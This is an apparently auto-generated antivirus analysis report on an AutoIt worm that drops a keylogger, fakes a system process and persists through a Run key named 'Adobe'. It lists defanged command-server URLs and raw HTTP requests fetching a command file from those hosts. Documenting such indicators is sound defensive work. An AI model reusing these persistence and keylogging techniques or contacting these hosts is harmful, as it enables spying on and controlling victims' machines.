Trojan.Win32.Agent.wi (Kaspersky), Worm.Win32.AutoIt.FD, WormAutoItGen.YR (Lavasoft MAS)Behaviour: Trojan, Worm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 76d056eab6a7a297f4115d32d7e3fff0
SHA1: 7b35cc6a7747abb090f34c5d3df98bb90461dae8
SHA256: 2583440d195e0e4caa830e0107b5164bf2f3cab10d7873ef4544ec5c2e708a4c
SSDeep: 196608:k5pKc849z9DyR6XUEW6LZNQ3AWkaoNDGrj0fU4EDRw57qc55t:qv9z9Dy4kEvrEA1ai4j6Si7zD
Size: 8875961 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: LCCWin32v1x, UPolyXv05_v6
Company: no certificate found
Created at: 2000-06-12 06:19:17
Analyzed on: Windows7 SP1 32-bit
Summary: Worm. A program that is primarily replicating on networks or removable drives.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Worm creates the following process(es):
%original file name%.exe:3676
SVHOST.EXE:3172
IDMSETUP.EXE:3148
KEYLOG.EXE:2452
rundll32.exe:1948
SETUP.EXE:3400
The Worm injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:3676 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Windows\System32\SETUP.EXE (1365 bytes)
C:\Windows\System32\KEYLOG.EXE (1980 bytes)
The process SVHOST.EXE:3172 makes changes in the file system.
The Worm deletes the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\lenh[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\lenh[1].txt (0 bytes)
The process IDMSETUP.EXE:3148 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp (187 bytes)
The process KEYLOG.EXE:2452 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\Desktop\Log.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KEYLOG.EXE.lnk (865 bytes)
The process rundll32.exe:1948 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O0QB1JLE\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\Y2WOAHMS\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\T3K3S2QD\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VQ5LGSJU\desktop.ini (67 bytes)
The process SETUP.EXE:3400 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
C:\Windows\System32\IDMSETUP.EXE (1024 bytes)
C:\Windows\System32\SVHOST.EXE (1897 bytes)
Registry activity
The process %original file name%.exe:3676 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Worm deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process SVHOST.EXE:3172 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASAPI32]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\svhost_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"GlobalUserOffline" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"
To automatically run itself each time Windows is booted, the Worm adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe" = "C:\Windows\wupdate.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
The process SETUP.EXE:3400 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Worm deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
| MD5 | File path |
|---|---|
| 856c5491185c204f8eeebce105209152 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp |
| 09959ee223c5d34c82f1efb8bc8233cb | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM100.tmp |
| 8c317c051ce2b577005f5823baa26dfa | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM106.tmp |
| 3114bb1630e44cfbd48b09e0d6057c8f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM110.tmp |
| f7f38ef34b96432c6a7f065a0a808084 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM111.tmp |
| 30e10c83a0f43363040fb3f58597f703 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM112.tmp |
| a6954e742acd89ca29a0cd1cae6c2b8a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM113.tmp |
| 84f258c82af5622f8319fbe8d7c0e7fd | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM3.tmp |
| 50c2e62660c7c1d26c60d320cc61f8a6 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM35.tmp |
| ef8b8abb7c22bca182ea727375d106d5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM36.tmp |
| 8733245b8d7a0038f46f65f945584e6f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM39.tmp |
| b289c20c10b241f6016fecd92b267098 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM40.tmp |
| 86bbadce4d28c78b4d1dca68eba45795 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM45.tmp |
| 48db4bfce6f3476dfa6602546f5fb5d4 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM46.tmp |
| 0f555fac769f520afd9de03482fa9fe5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM49.tmp |
| 8746b95e9fdba64c983d57e1da8f10e5 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM5.tmp |
| bdc1f5bb43db8f10464c063370ddd2e7 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM52.tmp |
| 222bdccbf0debd6cac36b92836d7b190 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM53.tmp |
| 225126e6277282ba7141383b87ecdce4 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM54.tmp |
| 95e07bdfa650d761d3b607d154d06a66 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM55.tmp |
| 0ef1e8299f58e1369b067f7b65d9f773 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM56.tmp |
| 371f4360c226b82a12692d4cca9a8434 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM57.tmp |
| f93cb9f9ad8a8e3919d40c96938a64af | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM66.tmp |
| ac822be8ffb08e7ea2ad573b9f87ea71 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM67.tmp |
| b06190af451b2037ff075aeb5d21e26f | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM68.tmp |
| 724944dc515ac36a507e5b2edcd07c2a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM69.tmp |
| 8c6af35602856595601f3cffc70317d8 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM7.tmp |
| c976ceb4be1daf3a848c11a4adf224ba | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM71.tmp |
| ffa3d7e622959b301a234723d7d26782 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM72.tmp |
| 7d427d9ae90bcc3d22db138b9eb3ce65 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM73.tmp |
| 3b2574a4bcaab325288db198e4b9cae6 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM8.tmp |
| f3a927a2118ad55ef562c1e943523142 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM88.tmp |
| 85d34e4f4eb601666c411645731e2bbf | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM92.tmp |
| ef7ef937843c764025ab95d490565a81 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM94.tmp |
| 108e532aa2ebb668b11b0c87b1289204 | c:\Windows\System32\IDMSETUP.EXE |
| ddd395ceded5836476b64da9acbeeaad | c:\Windows\System32\KEYLOG.EXE |
| 7ca0522e7ce22ba15e514b207c26ee9c | c:\Windows\System32\SETUP.EXE |
| 56d224011eb0a3beade972e1123701d3 | c:\Windows\System32\SVHOST.EXE |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:3676
SVHOST.EXE:3172
IDMSETUP.EXE:3148
KEYLOG.EXE:2452
rundll32.exe:1948
SETUP.EXE:3400 - Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
C:\Windows\System32\SETUP.EXE (1365 bytes)
C:\Windows\System32\KEYLOG.EXE (1980 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp (187 bytes)
C:\Users\"%CurrentUserName%"\Desktop\Log.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KEYLOG.EXE.lnk (865 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\O0QB1JLE\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\Y2WOAHMS\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\T3K3S2QD\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\VQ5LGSJU\desktop.ini (67 bytes)
C:\Windows\System32\IDMSETUP.EXE (1024 bytes)
C:\Windows\System32\SVHOST.EXE (1897 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe" = "C:\Windows\wupdate.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 2848 | 3072 | 4.07684 | f41d010ef3048c18a8afad0bffd69494 |
| .bss | 8192 | 580 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .data | 12288 | 104 | 512 | 2.16578 | 9529af9f59e0ccedfdfc324f0bf83531 |
| .idata | 16384 | 986 | 1024 | 2.99033 | db2569361ee483d3ea15134abc0d84bd |
| .rsrc | 20480 | 924 | 1024 | 2.39878 | 9cff17511d40ceaa4f6625a37b8f32af |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 11
39f8b9fea1a0a771737baef890fcd9b4
fd05bdf5019c4218ea56033f6fa1bd14
e505c9effa1c6fe3bb5728ebcd2abab0
db723c3085df6a5b998ac7da76b8ae6b
3c9c97b66c73826a32aa994b48d9cfa6
881f149fe9c25b3d5dc3924df259dea9
f759a6290c11536bea92776beff22f52
760304eac9dca1f2d391ad3dcb469b80
7c279ee03368b9f682c777549b5c5c06
45dc5bfc17fd6b93eded4209f199fea5
510d00f8a51a12019240640c36dc2718
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://long.nhatnghe.vn/trojan.txt | 103.27.60.195 |
| hxxp://cehlab.info/X/lenh.txt | 119.81.140.207 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /trojan.txt HTTP/1.1
User-Agent: AutoIt
Host: long.nhatnghe.vn
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 25 Feb 2017 17:00:03 GMT
Content-Length: 1245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="content-container"><fieldset>.. <h2>404 - File or directory not found.</h2>.. <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>.. </fieldset></div>..</div>..</body>..</html>....
<<< skipped >>>
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:27 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT..Content-Type: text/plain..Content-Length: 0..Date: Sat, 25 Feb 2017 17:14:27 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Connection: Keep-Alive......
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:32 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT..Content-Type: text/plain..Content-Length: 0..Date: Sat, 25 Feb 2017 17:14:32 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Connection: Keep-Alive......
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:38 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT..Content-Type: text/plain..Content-Length: 0..Date: Sat, 25 Feb 2017 17:14:38 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Connection: Keep-Alive......
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:43 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT..Content-Type: text/plain..Content-Length: 0..Date: Sat, 25 Feb 2017 17:14:43 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Connection: Keep-Alive......
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:49 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT..Content-Type: text/plain..Content-Length: 0..Date: Sat, 25 Feb 2017 17:14:49 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Connection: Keep-Alive......
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:54 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT..Content-Type: text/plain..Content-Length: 0..Date: Sat, 25 Feb 2017 17:14:54 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Connection: Keep-Alive......
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:14:59 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1 200 OK..Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT..Content-Type: text/plain..Content-Length: 0..Date: Sat, 25 Feb 2017 17:14:59 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Connection: Keep-Alive......
GET /X/lenh.txt HTTP/1.1
User-Agent: AutoIt
Host: cehlab.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Last-Modified: Wed, 22 Feb 2017 18:33:21 GMT
Content-Type: text/plain
Content-Length: 0
Date: Sat, 25 Feb 2017 17:15:05 GMT
Accept-Ranges: bytes
Server: LiteSpeed
Connection: Keep-Alive
HTTP/1.1..
Map
The Worm connects to the servers at the folowing location(s):
Strings from Dumps
KEYLOG.EXE_2452:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
SSh8*
SSh8*
PSSSSSSh
PSSSSSSh
Gt.Ht$
Gt.Ht$
t.jGZf;
t.jGZf;
PSSShl
PSSShl
PVSShl
PVSShl
j.Zf;
j.Zf;
;K|s%f
;K|s%f
?#%X.y
?#%X.y
GetProcessWindowStation
GetProcessWindowStation
operator
operator
kernel32.dll
kernel32.dll
oleaut32.dll
oleaut32.dll
RegDeleteKeyExW
RegDeleteKeyExW
advapi32.dll
advapi32.dll
Error text not found (please report)
Error text not found (please report)
operand of unlimited repeat could match the empty string
operand of unlimited repeat could match the empty string
POSIX named classes are supported only within a class
POSIX named classes are supported only within a class
erroffset passed as NULL
erroffset passed as NULL
POSIX collating elements are not supported
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
\N is not supported in a class
WSOCK32.dll
WSOCK32.dll
VERSION.dll
VERSION.dll
WINMM.dll
WINMM.dll
COMCTL32.dll
COMCTL32.dll
MPR.dll
MPR.dll
InternetCrackUrlW
InternetCrackUrlW
HttpQueryInfoW
HttpQueryInfoW
HttpOpenRequestW
HttpOpenRequestW
HttpSendRequestW
HttpSendRequestW
FtpOpenFileW
FtpOpenFileW
FtpGetFileSize
FtpGetFileSize
InternetOpenUrlW
InternetOpenUrlW
WININET.dll
WININET.dll
PSAPI.DLL
PSAPI.DLL
IPHLPAPI.DLL
IPHLPAPI.DLL
USERENV.dll
USERENV.dll
UxTheme.dll
UxTheme.dll
GetProcessHeap
GetProcessHeap
CreatePipe
CreatePipe
GetWindowsDirectoryW
GetWindowsDirectoryW
KERNEL32.dll
KERNEL32.dll
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
CloseWindowStation
CloseWindowStation
MapVirtualKeyW
MapVirtualKeyW
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
VkKeyScanW
VkKeyScanW
GetKeyState
GetKeyState
GetKeyboardState
GetKeyboardState
SetKeyboardState
SetKeyboardState
GetAsyncKeyState
GetAsyncKeyState
keybd_event
keybd_event
EnumThreadWindows
EnumThreadWindows
ExitWindowsEx
ExitWindowsEx
UnregisterHotKey
UnregisterHotKey
RegisterHotKey
RegisterHotKey
GetKeyboardLayoutNameW
GetKeyboardLayoutNameW
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GDI32.dll
GDI32.dll
COMDLG32.dll
COMDLG32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegCreateKeyExW
RegCreateKeyExW
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyW
RegDeleteKeyW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
SHFileOperationW
SHFileOperationW
ShellExecuteExW
ShellExecuteExW
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
IIIIIB(II<.fg>
IIIIIB(II<.fg>
7?_____ZZSSH%
7?_____ZZSSH%
~P.rU3
~P.rU3
%sQ6*
%sQ6*
x.ww3
x.ww3
.TBj|qx0qoez
.TBj|qx0qoez
8 >.Up
8 >.Up
e%X*b
e%X*b
40.Qa
40.Qa
-MeA.Ll
-MeA.Ll
.Pxx)^
.Pxx)^
.AXL{
.AXL{
%F$-{
%F$-{
.fQ6N
.fQ6N
> >$>(>=>
> >$>(>=>
5o6q6
5o6q6
6!6%6)6-616
6!6%6)6-616
343C3n3v3}3
343C3n3v3}3
:&:*:.:2:
:&:*:.:2:
4#4'4 4/43474;4
4#4'4 4/43474;4
mscoree.dll
mscoree.dll
combase.dll
combase.dll
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- floating point support not loaded
- floating point support not loaded
USER32.DLL
USER32.DLL
>>>AUTOIT NO CMDEXECUTE
>>>AUTOIT NO CMDEXECUTE
CMDLINERAW
CMDLINERAW
CMDLINE
CMDLINE
/AutoIt3ExecuteLine
/AutoIt3ExecuteLine
/AutoIt3ExecuteScript
/AutoIt3ExecuteScript
APPSKEY
APPSKEY
789:;?
789:;?
FTPSETPROXY
FTPSETPROXY
GUICTRLRECVMSG
GUICTRLRECVMSG
GUICTRLSENDMSG
GUICTRLSENDMSG
GUIGETMSG
GUIGETMSG
GUIREGISTERMSG
GUIREGISTERMSG
HOTKEYSET
HOTKEYSET
HTTPSETPROXY
HTTPSETPROXY
HTTPSETUSERAGENT
HTTPSETUSERAGENT
ISKEYWORD
ISKEYWORD
MSGBOX
MSGBOX
REGENUMKEY
REGENUMKEY
SHELLEXECUTE
SHELLEXECUTE
SHELLEXECUTEWAIT
SHELLEXECUTEWAIT
TCPACCEPT
TCPACCEPT
TCPCLOSESOCKET
TCPCLOSESOCKET
TCPCONNECT
TCPCONNECT
TCPLISTEN
TCPLISTEN
TCPNAMETOIP
TCPNAMETOIP
TCPRECV
TCPRECV
TCPSEND
TCPSEND
TCPSHUTDOWN
TCPSHUTDOWN
TCPSTARTUP
TCPSTARTUP
TRAYGETMSG
TRAYGETMSG
UDPBIND
UDPBIND
UDPCLOSESOCKET
UDPCLOSESOCKET
UDPOPEN
UDPOPEN
UDPRECV
UDPRECV
UDPSEND
UDPSEND
UDPSHUTDOWN
UDPSHUTDOWN
UDPSTARTUP
UDPSTARTUP
SendKeyDelay
SendKeyDelay
SendKeyDownDelay
SendKeyDownDelay
TCPTimeout
TCPTimeout
WINDOWSDIR
WINDOWSDIR
AUTOITEXE
AUTOITEXE
HOTKEYPRESSED
HOTKEYPRESSED
%s (%d) : ==> %s.:
%s (%d) : ==> %s.:
Line %d:
Line %d:
Line %d (File "%s"):
Line %d (File "%s"):
%s (%d) : ==> %s:
%s (%d) : ==> %s:
AutoIt script files (*.au3, *.a3x)
AutoIt script files (*.au3, *.a3x)
*.au3;*.a3x
*.au3;*.a3x
All files (*.*)
All files (*.*)
04090000
04090000
%u.%u.%u.%u
%u.%u.%u.%u
0.0.0.0
0.0.0.0
Mddddd
Mddddd
"%s" (%d) : ==> %s:
"%s" (%d) : ==> %s:
\??\%s
\??\%s
GUI_RUNDEFMSG
GUI_RUNDEFMSG
AUTOITCALLVARIABLE%d
AUTOITCALLVARIABLE%d
255.255.255.255
255.255.255.255
Keyword
Keyword
AUTOIT.ERROR
AUTOIT.ERROR
